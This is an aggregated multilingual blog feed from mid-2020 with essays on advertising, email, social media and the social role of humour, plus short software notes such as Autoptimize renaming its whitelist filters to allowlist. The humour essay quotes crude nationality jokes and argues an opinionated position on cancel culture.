Thanks Bertrand, Izidor, Parin, Jeff, Diego and all the contributors for the ride. I’m sorry to have been one of those « floss maintainers that disappear suddenly » but proud to have been part of this adventure and incredibly happy to see that the story continues. Long live Getting Things GNOME!

Photo by krisna iv on Unsplash.

Je suis @ploum, écrivain électronique. Si vous avez apprécié ce texte, n'hésitez pas à me soutenir sur Paypal ou en millibitcoins 34pp7LupBF7rkz797ovgBTbqcLevuze7LF. Vos soutiens réguliers, même symboliques, sont une réelle motivation et reconnaissance. Merci !

Ce texte est publié sous la licence CC-By BE.

July 06, 2020

La publicité n’est pas si mauvaise. Parfois elle agit. Avec sa propre éthique, il est vrai.

Si elle a lutté durant des décennies pour éviter qu’on interdise la promotion de la cigarette ou de l’alcool, si elle continue à vouloir nous faire acheter des gros SUV en nourrissant nos enfants de canettes et de barres sucrées, elle choisit ses combats.

Numerama rapporte qu’une publicité pour des vélos électriques aurait été censurée, car pouvant induire que l’automobile polluait. La publicité choisit ses combats.

Mais rassurez-vous, votre cerveau l’aura vite oublié.

Car pour lire cet article, Numera vous forcera tout d’abord à visionner une publicité pour un SUV.

La prochaine fois que vous vous demanderez pourquoi on ne fait rien contre le réchauffement climatique, rappelez-vous cette anecdote. Rappelez-vous que tout ce qui touche de près ou de loin à la publicité est coupable. Que même les publicités pour les vélos électriques ne nous sauveront pas ! La publicité, c’est le contraire de l’éducation. C’est transformer nos cerveaux pour les rendre disponibles à des messages simplistes. Le succès des anti-vaccins ou de ceux qui croient que la terre est plate ? Des cerveaux qui ont appris pendant des années à ne surtout pas réfléchir.

La publicité est partout ! Même au bord des circuits de course automobile (alors qu’à la vitesse où ils roulent, ça m’étonnerait que les pilotes aient le temps de les lire).

Tous sont coupables : Les publicitaires, les annonceurs, les.supports, les plateformes et tous ceux qui visionnent la pub sans tenter de s’en protéger activement.

Quoi ? Il ne reste plus grand monde ?

C’est bien là le problème…

Photo by Ploum on Unsplash. Screenshot contribué par Ledub.

Je suis @ploum, écrivain électronique. Si vous avez apprécié ce texte, n'hésitez pas à me soutenir sur Paypal ou en millibitcoins 34pp7LupBF7rkz797ovgBTbqcLevuze7LF. Vos soutiens réguliers, même symboliques, sont une réelle motivation et reconnaissance. Merci !

Ce texte est publié sous la licence CC-By BE.

As of the soon-to-be-released Autoptimize 2.7.4, all occurrences of “blacklist” and “whitelist” in the code will be changed into “blocklist” and “allowlist”. There is no impact for users of Autoptimize, everything will work as before.

If however you are using Autoptimize’s API, there are two (to my knowledge rarely used) filters that are now deprecated and will be removed at a later stage. `autoptimize_filter_js_whitelist` and `autoptimize_filter_css_whitelist` still work in 2.7.4 but if you’re using them switch to  `autoptimize_filter_js_allowlist` and `autoptimize_filter_css_allowlist` to avoid problems when they are removed in the release after 2.7.4.

This post is the third in a four-part blog series by Peter Zaitsev, Percona Chief Executive Officer.

July 04, 2020

Onder de indruk van Ilja Leonard Pfeijffer‘s columns over Corona in Genua las ik tijdens onze vakantie zijn magistrale “Grand Hotel Europa” over liefde, een oud hotel in volle evolutie, het avontuurlijk (en gewelddadig) leven van Carravagio, het genie van Damien Hirsh en vooral over hoe Europa beetje bij beetje een pretpark voor toeristen wordt (Venetië, maar dichterbij ook Amsterdam of ons eigen Brugge?) terwijl we ons blindstaren op ons eigen groots cultureel erfgoed zonder dat we goed weten wat dat inhoudt.

Toegegeven, soms was Ilja me even kwijt wanneer er werd ingegaan op pakweg cultuur-filosofische vraagstukken, maar dat werd ruimschoots gecompenseerd door een sterke rode draad en een gezonde dosis zelfspot. Een aanrader!

Na een zware periode waar ik zelf angst heb gehad, bedacht ik me een paar uur geleden:

Niets blijkt moeilijker te zijn dan te accepteren dat er geen gevaar is.

Ik heb besloten dat dit de nieuwe ondertoon van deze blog wordt. Wat dat juist wil zeggen? Dat een tiental van de komende blog artikels dat als lijn gaan aanhouden.

Clowns to the left of me are prevaricating (uitereraard een verwijzing naar de song die in Reservoir Dogs aanwezig was), is geschiedenis.

Wat was het vorige? Toen dacht ik er vast nog niet zo hard over na. Misschien zou ik dat nu beter ook niet doen? Ik denk te veel over ongeveer alles na.

Dus, daarom de nieuwe ondertitel:

Accepteer, dat er geen gevaar is.

Ik heb hem Nederlands gemaakt. Want de enige groepen die zich in mijn blog interesseren zijn a) jullie of b) misschien staatsveiligheid. Die laatste heeft in dat geval een budget om één en ander te laten vertalen en jullie spreken al Nederlands.

Goed ja. Er is wel wat gevaar natuurlijk. Maar we hebben het eigenlijk erg goed onder controle.

July 03, 2020

July 02, 2020

This post is the second in a four-part blog series by Peter Zaitsev, Percona Chief Executive Officer.

June 30, 2020

Je me suis surpris à envoyer un long email à une personne que je suis depuis plusieurs années sur les réseaux sociaux. J’ai pris le temps de rédiger cet email. De le relire. De le corriger. De l’affiner. J’y exprime une idée simple que j’aurai pu lui envoyer sur Twitter, que ce soit en le mentionnant ou en messagerie privée. Je lui dis, tout simplement, que je ne souhaite plus interagir sur Twitter.

Le fait de prendre du temps, de réfléchir, de me relire m’a procuré un énorme plaisir. J’avais l’impression d’avoir apporté un petit quelque chose au monde, une clarification de mes idées, une main tendue, une piste de réflexion partagée. J’ai construit quelque chose d’intime, où je me révèle.

En tentant de regagner le contrôle de mon cerveau, j’ai retrouvé, sans le vouloir, l’art désuet de la relation épistolaire.

Nous avons oublié l’importance et la facilité de l’email. Nous l’avons oublié, car nous n’en avons pas pris soin. Nous laissons notre boîte aux lettres pourrir sous des milliers de messages non sollicités, nous perfectionnons volontairement l’art de remplir nos boîtes de courriels inutiles, inintéressants, ennuyeux sans plus jamais prendre le temps d’y déposer un courrier utile, écrit, intime.

Nous croyons que le mail est ennuyeux alors que ce sont nos pensées qui sont obscurément désertes. « Ce qui se conçoit bien s’énonce clairement et les mots pour le dire viennent aisément », disait Boileau. Force est de constater que nos cerveaux sont désormais d’infernaux capharnaüms assiégés par d’innombrables tentatives de les remplir encore et encore. Anesthésiés par la quantité d’informations, nous ne trouvons d’échappatoire que dans la consommation.

Souhaitant soigner ma dépendance à Twitter, j’avais décidé de ne plus suivre que quelques comptes sélectionnés dans mon lecteur RSS grâce à l’interface Nitter. En quelques semaines, une froide vérité s’est imposée à moi : rien n’était intéressant. Nous postons du vide, du bruit. Une fois ôtées les fonctionnalités affriolantes, les notifications, les commentaires, le contenu brut s’avère misérable, souffreteux. J’avais pourtant sélectionné les comptes Twitter de personnes particulièrement intéressantes et intelligentes selon mes critères. Las ! Nous nous complaisons tous dans la même fange d’indignation face à une actualité très ciblée, le tout saupoudré d’autocongratulation. Réduite à quelques caractères, même l’idée la plus enrichissante se transforme en bouillie prédigérée conçue pour peupler un hypnotique défilement intinterrompu.

Un soir, alors que je profitais de ma douche pour articuler un concept théorique qui m’occupait l’esprit, j’ai réalisé avec effroi que je pensais en threads Twitter. Mon esprit était en train de diviser mon idée en blocs de 280 caractères. Pour le rendre plus digeste, plus populaire. J’optimisais spontanément certaines phrases pour les rendre plus « retweetables ».

En échange d’un contenu de piètre qualité, Twitter déformait mes pensées au point de transformer mon aquatique méditation vespérale en quête semi-consciente de glorioles et d’approbations immédiates. Le prix payé est inimaginable, exorbitant.

Ayant bloqué tous les sites d’actualité depuis belle lurette, je décidai que Twitter et Mastodon allaient suivre le même régime que Facebook et Linkedin : ne plus suivre personne. Je nourris désormais ma sérendipité d’écrits plus longs grâce à l’ancienne magie vaudoue du RSS.

Libéré, aéré, le cerveau retrouve soudain de la souplesse, de l’amplitude. Au détour d’une blague dans un forum que je suis, je crois deviner qu’un politicien a été mis en prison. L’information m’agresse. Elle occupe une place imméritée dans mon cerveau. Je n’avais pas envie de savoir cet inutile artefact qui sera vite effacé de la conscience publique. Comme un ancien fumeur soudainement allergique à la fumée, mon cerveau ne peut plus supporter les déchets pseudo-informationnels dont nous sommes abreuvés par tous les pores, par tous les écrans, par toutes les conversations.

Une fois débarrassé de cette gangue d’immondices, je me surprends à penser. Mes doigts se surprennent à vouloir écrire plutôt qu’à rafraîchir une page et réagir avec une émotion préfabriquée. Au lieu d’une démonstration publique de mon égotique fierté travestie en succédané de communication, j’ai envie de forger des textes, des histoires, de faire passer une information dans un contexte plus large, de lui donner le temps d’exister dans l’esprit des récipients. Et tant pis si ces derniers sont moins nombreux, moins enclins à m’injecter leurs likes chargés de dopamine.

Devant ma boîte aux lettres, immaculées grâce à une stricte observance des mes règles inbox 0 et de désabonnement, je guetterai la réponse comme un adolescent attend le facteur lui tendant une enveloppe parfumée. Et si elle ne vient pas, ma vie continuera sans que je sois obnubilé par un compteur de vues, de likes ou de partages.

L’outil de communication décentralisé web 5.0, 6.0 et 12000.0 existe déjà. C’est l’email. Nous n’avons tout simplement pas encore vraiment appris à l’utiliser. Nous tentons vainement de le remplacer ou de l’améliorer à grands coups d’interfaces et de fonctionnalités multicolores, car il expose la vacuité de nos interactions. Il met à nu que nous devrions faire un effort, changer notre cerveau et notre volonté. Tant que nous nous évertuerons à produire et consommer le plus de bruit possible en insatiables gloutonneries, tant que nous mesurerons notre succès avec d’autocrates statistiques, aucun système ne nous permettra de communiquer. Parce que ce n’est pas ce que nous cherchons. Parce que nous nous sommes perdus dans l’apparence et la quantité, jetant aux oubliettes l’idée même de qualité. Nous critiquons la faiblesse d’esprit et le court-termisme de nos politiciens sans réaliser que nous moquons notre propre reflet.

Lorsque nous serons assez mûrs pour tout simplement vouloir échanger de l’information de qualité, nous découvrirons que la solution était sous nos yeux. Si simple, si belle, si élégante, si décentralisée.


Photo by Matt Artz on Unsplash

Je suis @ploum, écrivain électronique. Si vous avez apprécié ce texte, n'hésitez pas à me soutenir sur Paypal ou en millibitcoins 34pp7LupBF7rkz797ovgBTbqcLevuze7LF. Vos soutiens réguliers, même symboliques, sont une réelle motivation et reconnaissance. Merci !

Ce texte est publié sous la licence CC-By BE.

Here are the steps needed to add a new SWAP partition to your Linux machine. This’ll allocate 2GB of space on your disk, and allow it to be used as RAM if your server is running low.

June 29, 2020

This post is the first in a four-part blog series by Peter Zaitsev, Percona Chief Executive Officer.
Quick tip if you want to skip the pre-commit validations and quickly want to get a commit out there.

June 27, 2020

Cover Image - Chad and Virgin Laughing
"Een gevoel voor humor weerspiegelt een gevoel van verhouding. Het schiet in actie wanneer een verstandiger deel van ons een gesloten gedachtengoed kortsluit."

Toen ik klein was, was het de gewoonste zaak in Europa om te lachen met onze internationale buren. We waren onofficiële rivalen, soms wederzijds, soms enkel richting, volgens de culturele en historische stereotypes van die tijd.

De 'Hollanders' grapten over ons:

Een Belgische bouwvakker helpt mee over de grens in Nederland, en ziet een Nederlander koffie schenken uit zijn thermoskan.

"Wat is dat?" vraagt hij.
"Dat is een thermos! Als je er iets warm in giet, blijft het warm. Als je er iets koud in giet, blijft het koud."
"Geniaal! Hoeveel wilt ge ervoor?"
"Je mag 'em hebben voor 25 gulden."

De volgende dag werkt hij weer in België en toont hij trots zijn nieuwe vondst aan zijn collega's.

"Dat is nen thermos! Als ge er iets warm in giet, blijft het warm. Als ge er iets koud in giet, blijft het koud."
"Wauw! En hoe weet dat ding dat?"

Wij tapten natuurlijk ook mopjes over hen:

Een bus met 50 Nederlandse vakantiegangers rijdt naar de Costa del Sol en stopt aan een tankstation in België.

De chauffeur vraagt aan de bediende: "Kan ik soms een emmer water krijgen? Mijn motor kan niet goed tegen deze hitte!"

"Geen probleem!" Hij verdwijnt en keert terug met een grote klotsende emmer.

"En euh... heb je soms 51 rietjes?"

Omdat Belgen (lees: Vlamingen) dom waren, en Nederlanders gierig. Dit zijn eigelijk veel properdere moppen dan die van ons, zoals:

"Hoeveel keer gebruikt een Nederlander een condoom?"
"Drie keer. Eén keer gewoon, één keer binnenstebuiten, en de derde keer als kauwgom."

(Dit was nog in de basisschool, FYI)

Maar de grap heeft een karmische omkering:

"Hoeveel keer lacht een Belg met een mop?"
"Drie keer. Eén keer als je ze vertelt, één keer als je ze uitlegt, en de derde keer wanneer hij ze snapt."

Asterix and Obélix - Map of Gaul

Europa Universalis

Wie even googlet ontdekt snel dat de basismoppen over nationaliteit extreem pro forma zijn. Je kan grotendeels gewoon de landen omwisselen of veranderen, om zo een andere mop te krijgen die ooit ook wel eens verteld werd. Zoals deze klassieke mop over de treintunnel:

Een non, een mooie blonde dame, een Duitser en een Nederlander zitten samen in een treincompartiment. De trein rijdt een tunnel in, het is pikdonker, en plots is er een klap. Wanneer de trein terug het licht in rijdt, wrijft de Duitser met pijn in zijn gezicht.

De non denkt: "Die Duitser heeft waarschijnlijk de dame aangeraakt, en ze heeft hem correct op de vingers getikt."

De dame denkt: "Die Duitse vetzak heeft mij proberen aan te randen, maar zat per ongeluk bij de non. Goed dat ze hem een mep heeft gegeven."

De Duitser denkt: "Die Nederlander heeft waarschijnlijk zijn handen niet kunnen thuis houden, maar die blonde dacht dat ik het was! De klootzak!"

De Nederlander denkt: "De volgende tunnel geef ik die vuile Duitser weer een mep!"

De landen zijn nabije buren, dus is er altijd wel één of andere stereotiepe, historische ruzie. Als je de landen verandert, kan de mop ook omslaan, naargelang wat je vooroordelen zijn.

Als de Nederlander agressief is, dan zou je kunnen denken dat het wraak is voor de Duitse agressie tegenover Nederland. Als je een versie vertelt waarbij de Duitser de Nederlander slaat, dan zou dat misschien unilaterale Duitse agressie kunnen voorstellen. De reden waarom de mop met nationaliteiten verteld wordt is ook waarom het om een non en een mooie blonde dame gaat: het voegt de nodige kleur toe, zodat de personages (en het publiek) meteen allerlei verkeerde conclusies kunnen trekken.

Je denkt dat de nationaliteiten belangrijk zijn, maar dat wordt eigelijk nooit gezegd. Het misleidt je, zodat je mee kan volgen. De echte clou is dat je geen ingewikkelde uitleg nodig hebt voor een regelrechte aanval. Een mop over nationale agressie kan universele thema's blootstellen, met 4 tegenstrijdige perspectieven, die ook allerlei andere gevoelige snaren aanraken.

Je moet natuurlijk wel rekening houden dat het Europa waarin zulke moppen vaak verteld werden helemaal anders was dan vandaag. De hint zit in de "25 gulden" in de eerste mop. Dit was vóór de Euro, voor de douane-unie, de Schengen zone, en moderne elektrische treinen om het allemaal netjes mee te verbinden. Je moest gewoon enkele uren in eender welke richting rijden om een plaats te vinden waar je toestemming nodig had om binnen te komen, waar je de taal niet sprak, niet wist hoeveel zaken kostten, de plaatselijke wetten niet kende, en niet op gelijk niveau kon omgaan met de instanties. Dit waren ook dezelfde mensen wiens voorouders jouw voorouders enkele eeuwen lang hadden zitten uitmoorden... maar ze leken nu toch wel grotendeels ok?

Als je in zulk een situatie leeft, dan is het perfect normaal om het allemaal te trivialiseren en er moppen over te tappen. Doen alsof het allemaal een ver-van-mijn-bed-show is. Om te zeggen: als we toch allemaal personages gaan zijn in een drama waar niemand van ons eigelijk veel in te zeggen heeft, laat ons er dan maar wat lol mee hebben. Sommige van deze moppen bevatten natuurlijk wel een enorme hoeveelheid historische en culturele context, bijvoorbeeld:

In de hemel zijn de flikken Brits, de chef-koks Frans, de mecaniciens Duits, de minnaars Italiaans, en dit alles georganiseerd door de Zwitsers.

In de hel zijn de chef-koks Brits, de mecaniciens Frans, de minnaars Zwitsers, de flikken Duits, en dit alles georganiseerd door de Italianen.

Dat is een gepeperde samenvatting van ongeveer 150 miljoen mensen over een periode van op z'n minst een eeuw. Wie zulke moppen vertelde deed dat niet uit haat. Wanneer een Mysterieuze Vreemdeling effectief ons dorpje binnenkwam, dan waren de meesten vooral heel nieuwsgierig en vriendelijk. Je deelde ze ook niet tenzij je al goed overeenkwam (of net absoluut niét), en je de pretentie dus achterwege kon laten. De doelgroep was vooral onze eigen stam, en het doel was net om de collectieve onrust en angst van het vreemde in te perken. Als je iemand een mop over hen vertelt, geef je iets heel intiem bloot.

Bij de Belgen en de Nederlanders moet je niet ver gaan zoeken. Onze angst was dat ze ons zouden wegconcurreren met hun superieure kennis van zaken. Hun angst was dat ze zouden verliezen tegen een volk dat ze onwaardig vonden.

Dit zijn universele thema's.

Vrij Spel

Het is enorm waardevol als je iemand kan horen spreken zonder filter, met of zonder humor. En ik bedoel niet dat je citaten kan gaan mijnen om ze zwart mee te schilderen.

Lang geleden was ik bij nieuwe vrienden die nog niet wisten dat ik homo was. Ze waren aan't lachen met hún homoseksuele kotmaat. Deze kerel gebruikte namelijk regelmatig enorme hoeveelheden WC-papier, en dat probeerden ze dus uit te leggen door de connectie te maken met zijn veronderstelde seksuele activiteiten aan de achterpoort. Ik heb er niks van gezegd, en ik had zeker geen zin in een instant "coming out". Ik lachte gewoon mee, en het gesprek ging verder.

Vandaag de dag vinden sommigen dat dit ongetwijfeld homofoob was. Dat zulke humor bekrompen is en de waardigheid van het doelwit aantast. Dat zulk materiaal met allerlei waarschuwingen moet bestempeld worden, en dat zij die er vrij over spreken zich moeten verontschuldigen en boete doen. Dat het niet alleen toepasselijk maar onze morele plicht is om in te grijpen (en het zo allemaal rond mij te laten draaien, handig).

Ik wist daarentegen dat deze kerels aan't lachen waren omdat ze er niet over durfden praten met de jongeman in kwestie. Je gaat niet zomaar effe over iemand anders zijn toiletbezigheden babbelen. Eens je die verbinding maakt tussen humor en taboe, is het echt niet zo verbazend dat toilethumor bestaat.

Ik denk ook dat als ze wél hadden geweten dat ik homo was, dat ze die allusies niet hadden gemaakt, of zich erover geschaamd hadden, en dan was het een Gênante Situatie geweest. In plaats daarvan konden ze een moeilijke vraag aankaarten, over iemand waar ze mee samenwoonden, en leesbaar maken. Ik kon gewoon "één van de kerels" blijven, door de regels, context en bedoeling te vatten. Als ik dat vandaag de dag wil, dan moet ik gewoon achter gesloten deuren iets grappig en grof over homo's zeggen, om te tonen dat het geen gevaarlijke valkuil moet zijn.

Dit is hoe de LGBT-wereld het al decennia lang aanpakt. Drag queens gebruiken hun humor en spot bijvoorbeeld als een pantser, maar het is enkel volwaardig als je ook met jezelf kan lachen. The Adventures of Priscilla: Queen of the Desert (1994) heeft dit fantastisch in beeld gebracht:

Ik vind mij dus volledig in dat citaat van John Cleese over hoe een verstandiger deel van ons een gesloten gedachtengoed kan kortsluiten.

Het benadrukt ook weer dat humor compleet contextueel is, omdat het de bedoeling net is om te dansen op de rand van wat je mag zeggen en denken. Als er iets taboe is, als er iets bekrompen is, dan jaagt komedie daar het meest achter.

Als voorbeeld, neem twee scenes, met twee jaar verschil. Eerst, het begin van American Pie (1999):

Het hoofdpersonage wordt door zijn conservatieve ouders betrapt terwijl hij zich aftrekt en illegale TV-porno probeert te kijken. De scene wordt grotendeels serieus gespeeld. Dit was redelijk stout in zijn eigen tijd, als mainstream Amerikaanse film, en weerspiegelde de Christelijke taboes rond tienerseks. Vooral als je weet dat de American Pie in de titel óók haar maagdelijkheid verliest. Dit was zo memorabel dat de New York Times er 20 jaar later een opiniestuk over publiceerde. Als iemand zich er toen beledigd door voelde, dan waren dat vooral mensen die op de ouders leken, die niet over seks konden denken of praten zonder te blozen.

Vandaag echter zijn het vooral mensen van de politieke overkant die deze film grof en beledigend gaan vinden. De redenen zijn het seksisme, de homograppen, enzovoort. Als je de pers gelooft zijn er een hoop die ontevreden zijn, maar eigelijk denk ik dat ze gewoon een excuus wilden om een filmpje te posten van een kerel die doet alsof hij een appelvlaai neukt.

Veel interessanter is hoe deze scene geparodieerd werd in Not Another Teen Movie (2001). Over deze film valt veel te vertellen, omdat het met verve allerlei jaren 80 en 90 tienerfilmclichés aan elkaar breit. Ze nemen zichzelf absoluut niet serieus door net het bronmateriaal heel serieus te nemen, met fantastische vertolkingen. Het begint dus met een directe hommage aan American Pie, alleen hebben ze echt ieder aspect van die scene tot absurde proporties uitvergroot:

Het is compleet logisch als je snapt dat tienerseks en hormonale drang toen heel controversieel was. In plaats van een verlegen kerel met een sok, krijgen we dus een onvervaarde jonge dame met haar XXL roze vibrator met bloemekes. Iedereen loopt de kamer binnen, zelfs oma en de pastoor. Het eindigt met een slagroombukkake, om zo de film in te luiden. En ze gaan gewoon zo verder, door telkens het bronmateriaal slim te verknippen met een overgrote dosis WC-, seks- en andere humor. Dat lukt grotendeels, met slechts enkele verkeerde pasjes, zoals de grap over het Obligatoire Zwarte Personage die heel de film lang uitgerekt wordt.

Als je dacht dat het mikpunt net vrouwen was, of LGBTs, of zwarten, dan heb je het helemaal niet gesnapt. Want dit was een grote middenvinger in de richting van puriteinse moraalridders. Zij maakten zich toen bijvoorbeeld ook druk over een paar blauwe tetten in profiel, in een videospel dat ze zelf nooit gespeeld hadden.

Het doelpubliek vond de film in ieder geval hilarisch, wat natuurlijk het belangrijkste is.

De Grapruimte

Ik heb vooral voorbeelden gebruikt die nu verouderd lijken, en zelfs te provinciaal.

Moppen over internationale rivalen zijn grotendeels verdwenen, omdat we nu veel meer over elkaar weten. Dankzij open grenzen, en een geharmoniseerde economie en wetboeken, hebben we een leesbaar continent waar iedereen gemakkelijk met elkaar kan vergelijken. We hoeven geen grappen meer te maken over welk land het beste draait, we kunnen samen gewoon naar de COVID-cijfers gaan kijken.

Je gaat zulke humor vandaag de dag vooral tegenkomen in de context van een Aprilgrap of "shitposting", zoals deze twee memes:


Meestal gepost door respectief een Nederlander of een Belg, verwijzend naar het Nederlandse talent voor imperialisme en het Belgische talent voor onnodige bureaucratie. Het wilt zeggen dat er vooral dus Nederlanders of Belgen in een bepaalde discussie of ruimte rondhangen. Maar het mag eigelijk enkel ironisch gebruikt worden, want anders is het heel tiresome.jpg.

Seksuele humor is ook grotendeels verminderd, omdat het internet ons pornografie én normale seksuele opvoeding geeft in overvloed, en de basistaboes verdwenen zijn. In plaats van een groepje studenten die zich allemaal afvragen hoe homo's het nu feitelijk doen, heb je een hoop kerels die er ooit wel eens naar gekeken hebben, er niks aan vonden, en er verder niet meer over hebben nagedacht.

De ruimte van aanvaardbare en populaire grappen evolueert dus continu. Men zegt ook soms: "Als je wilt weten wie over jou heerst, zoek uit wie je niet mag bekritiseren." Dit telt dubbel voor "...of waar je niet mee mag lachen."

Dit wordt vaak en onjuist toegeschreven aan Voltaire, maar vreemd genoeg blijkt het uit een essay van 1993 te komen, geschreven door een echte, effectieve, onvervalste blanke nationalist. TIL.

Het maakt natuurlijk niks uit wie het gezegd heeft, enkel of het waar is of niet. Men zegt gemakkelijk dat het niet waar kan zijn, omdat je bijvoorbeeld niet mag spotten met mentaal gehandicapten, die zich zeker niet kunnen verdedigen. Maar dat is niet juist, want zulke spot lokt natuurlijk een reactie uit van zij die wél de macht hebben om mensen te straffen, namelijk allerlei organisaties die ogenschijnlijk de rechten van bepaalde groepen bevorderen.

Het probleem hiermee is dat dit systeem gedreven wordt door aandacht, niet door resultaten. Het essay The Toxoplasma of Rage beschrijft dit in detail, geschreven door onlangs onthulde blogger Scott Alexander Ocasio-Cortez. Wanneer de keuzes die het meest beloond worden nét die zijn die het meeste aandacht trekken, dan versterk je vaak de spanning tussen verschillende groepen in plaats van ze te verminderen, en schep je meer wrok.

Het verwart ook zij die reeds hulp kunnen krijgen met zij die er nog steeds nood aan hebben. Als toonvoorbeeld, wat er hier een tijd geleden gebeurde: een oude Joodse vrouw belde een stand-by verpleegdienst op (als ik het mij goed herinner). Toen de verpleegkundige hoorde dat ze Joods was, verweet die haar al de collectieve zonden van Israel tegen Palestina, en was verder grof en onbehulpzaam. Ik weet het alleen maar omdat het de dag erna in alle kranten stond, omdat een pro-Joodse organisatie het had aangekaart.

Het zou heel anders gegaan zijn als het bijvoorbeeld een dakloze of een drugsverslaafde was die immoreel behandeld werd. Het zou praktisch onmogelijk zijn dat zo iemand op die manier erkenning kan krijgen, laat staan compensatie. Of je dat nu "heersen" wilt noemen of niet, het zijn twee compleet verschillende niveaus van toegang en dienstverlening, met als enig verschil welke groep van mensen je nu wel of niet mag generaliseren.

Een ander argument tegen niet-Voltaire zijn komieken zoals Dave Chappelle of Bill Burr, die allebei kritisch waren tegen "cancel culture" en zogenaamde "alphabet people" (LGBTQIAA2+). Zij lokten ogenschijnlijk hun eigen ondergang uit, maar in plaats daarvan oogstten ze enorm veel succes. De bijna-jaarlijkse speeches van Ricky Gervais op de Golden Globes zijn gelijkaardig. Hij zegt iedere keer dat hij nooit meer uitgenodigd gaat worden, terwijl hij een zaal enorm rijke mensen volledig in de kak zet:

Deze komieken zijn eigelijk onschendbaar, en hun carrière en levensstijl staan buiten spel. Het zijn multi-miljonairs met geslaagde projecten op hun CV. Daarom net dat het hen wél lukt. Wie geen "fuck you money" heeft, en geen paar stalen ballen, maakt zichzelf een doelwit als ze zulke grappen maken. En er zijn mensen met motivatie en middelen die daar antwoord op zullen geven. De zegswijze is "wie over jou heerst" niet over hén.


Ik vind het enorm fascinerend omdat het van humor een soort van "Romulan Neutral Zone" maakt, op de rand van het normale politieke Overton Window. Deze zone is groter en omvat niet alleen wat aanvaardbaar is, maar ook wat betwist wordt. De grappen zijn de kogels, maar het pantser is zelfvertrouwen, geput uit vaardigheid en succes. Komieken spelen dit spelletje iedere show-avond op Nightmare niveau.

De zone omvat net die ideeën waar humor effectief op kan werken. Humor verandert of weerlegt onze wereldbeschouwing met geconcentreerde salvo's van verborgen wijsheid of surrealisme. Maar de knoop moet wel toegankelijk genoeg zijn om te ontwarren. Het bereik van humor wordt beperkt door zijn eigen regels, zoals "Te Vroeg", "Dat is NIET grappig", "Expreslift Naar De Hel Als Ik Lach" of "Ik Snap Het Niet". Dit zijn heel subjectieve grenzen, continu onderhandeld tussen de verteller en het publiek. Als je mij niet gelooft, neem dan de mop over de 51 rietjes, maar vervang "Nederlands" door "Joods".

Als je denkt dat de Joden daarom over jou heersen, dan kijk je niet naar hoe zulke zaken zich effectief uitspelen. Want wat werkelijk over jou heerst is de chronische en ongekalibreerde angst dat je er niet mee aan't lachen bent, die zich in allerlei vormen toont. Dit verklaart waarschijnlijk ook waarom je de mensen moet doen lachen als je ze iets wilt vertellen dat ze niet willen horen, want anders gaan ze je lynchen. Goeie humor is een succesvolle mentale afweer tegen een gedachtengang die te strak en dogmatisch is.

Het verhaal van Mark Meechan is hierbij heel relevant. Dit is de Schot die veroordeeld werd voor "extreem beledigend gedrag" omdat hij zijn hondje aangeleerd had om een hitlergroet te doen als hij "Gas the Jews" zei. Hij heeft altijd gezegd dat hij het puur gedaan had om zijn lief te ambeteren. De "rechtsgang" in dit geval vond dat "context en bedoeling" officieel irrelevant waren voor zulke feiten, wat natuurlijk een atoombom van precedent is. Maar het is nog absurder: in een documentaire van de BBC over deze kwestie, vraagt één van de critici zijn eigen kat ook "Gas The Jews?", die natuurlijk nee zegt "omdat hij goed opgevoed werd". Volgens de uitspraak van het Brits gerecht is die man dus schuldig aan exact hetzelfde misdrijf, en is deze video het enige nodige bewijs.

Ze zagen iemand die grappen maakte die ze beledigend vonden, en dachten dat dit een werkelijke bedreiging vormde voor hun maatschappij. In hun paniek zijn ze dan begonnen met één van de noodzakelijke fundamenten van die maatschappij af te breken. En ze zijn nog steeds bezig.

Het is één grote grap, maar hunne frang is nog niet gevallen.

* * *

Humor is niet zo maar een willekeurige evolutionaire tic, of een zinloze activiteit. Het is een fundamenteel mechanisme dat we zowel individueel als collectief gebruiken om onze rederingen te checken. Humor licht net de grenzen toe van waar we misschien fout bezig zijn, en helpt om fixaties en taboe te doorbreken.

We vinden iets grappig als het ons verrassende en tegenstrijdige signalen geeft, allemaal tegelijkertijd. Als we die snel en juist kunnen uitwerken, en in de grotere wereld kunnen plaatsen, kunnen we iets nieuws en waar leren. Dit wilt ook zeggen dat als de humorpolitie op het toneel verschijnt, dat dit een symptoom is van een collectief gebrek aan begrip, en van onbespreekbare taboes.

Wie pret en spot verbant, verbant uitdagende inzichten, en dat doen we op eigen risico.

Cover Image - Chad and Virgin Laughing
Cover Image - Chad and Virgin Laughing
"A sense of humour is a reflection of a sense of proportion. It occurs when the wiser part of ourselves short-circuits a closed system of thought."

When I was a kid, mocking your international neighbors was the normal thing to do in Europe. More so there were unofficial rivalries, sometimes mutual, sometimes one-way, embodying cultural and historical stereotypes.

The Dutch told jokes like this about us:

A Belgian construction worker is helping out across the border in the Netherlands, and sees a Dutchman pour coffee from his thermos.

"What's that?" he asks.
"It's a thermos! If you put hot things in it, they stay hot. If you put cold things in it, they stay cold."
"That's amazing! How much do you want for it?"
"It's yours for 25 guilders."
"I'll take it!"

The next day he's back in Belgium and proudly shows off his new find during lunch.

"It's a thermos! I got it from the Netherlands! If you put hot things in it, they stay hot. If you put cold things in it, they stay cold."
"Wow, that's amazing! How does it know?"

In turn, we told jokes about them:

A bus with 50 jolly Dutch vacationers is driving down to the Spanish coast, and stops by a gas station in Belgium.

The driver asks the attendant: "Could I get a bucket of water? My engine is having some trouble with this blistering heat!"

"No problem at all!" He goes out back and returns with a big sloshing bucket.

"Also... do you happen to have 51 straws?"

It's not very complicated. Belgians were dumb, and the Dutch were stingy. These are actually much cleaner jokes than the ones we told, because that included:

"How many times does a Dutchman use a condom?"
"Three times. Once the normal way, once inside out, and the third time as chewing gum."

(This was still in primary school, by the way.)

But this joke has a karmic reverse:

"How many times does a Belgian laugh at a joke?"
"Three times. Once when you tell it, once when you explain it, and the third time when he gets it."

Asterix and Obélix - Map of Gaul

Europa Universalis

A casual search will show that the basic jokes about nationality are so scripted, that you can pretty much substitute any country for any other, and arrive at a joke that has been told some place some time. Like this classic train tunnel joke:

A nun, an attractive blonde, a German and a Dutchman are sitting in a train compartment. The train enters a tunnel, it's completely dark, and suddenly there's a slap. When the train comes out of the tunnel, the German is rubbing his face in pain.

The nun's thinking: "The German man probably touched the blonde woman and she slapped him, and rightfully so."

The blonde's thinking: "That German pervert probably tried to grope me, but got the nun instead, and she slapped him. Good."

The German thinks: "The Dutchman obviously copped a feel on that blonde woman, and she hit me instead of him. That bastard!"

The Dutchman thinks: "Next tunnel, I'm gonna slap that German fucker again!"

The nationalities are close neighbors, and that means there's some sort of stereotypical, historical beef. When you change the countries, the joke's meaning can flip, depending on what your preconceptions are.

